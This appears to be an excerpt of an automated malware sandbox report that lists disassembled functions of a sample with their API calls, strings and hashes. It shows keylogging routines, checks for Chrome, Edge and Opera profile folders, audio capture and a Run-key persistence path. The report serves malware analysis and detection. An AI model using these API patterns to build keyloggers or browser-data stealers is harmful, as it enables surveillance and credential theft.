                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx$PkGNG
                                    • API String ID: 2568140703-1065776982
                                    • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                    • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                    • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                    • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                    Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$kKD
                                    • API String ID: 1901932003-3269126172
                                    • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                    • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                    • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                    • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                    Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                    • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                    • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                    • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                    Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                    • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                    • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                    • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                    Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                    • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                    • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                    • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                    Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B686
                                      • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                      • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                      • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                      • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                      • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                      • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                      • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                      • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                    • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                    • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                    • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                    Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                    • API String ID: 2086374402-949981407
                                    • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                    • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                    • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                    • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                    Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                    • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                    • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                    • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                    Function 004555CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___initconout.LIBCMT ref: 004555DB
                                      • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleCreateFileWrite___initconout
                                    • String ID: PkGNG
                                    • API String ID: 3087715906-263838557
                                    • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                    • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                    Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                    • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                    • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                    • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                    Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    • __Init_thread_footer.LIBCMT ref: 00410F64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                    • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                    • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                    • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                    Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                    Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                    • GetLastError.KERNEL32 ref: 00440D85
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                    • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                    • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                    • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                    Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                    • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                    • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                    • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                    • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99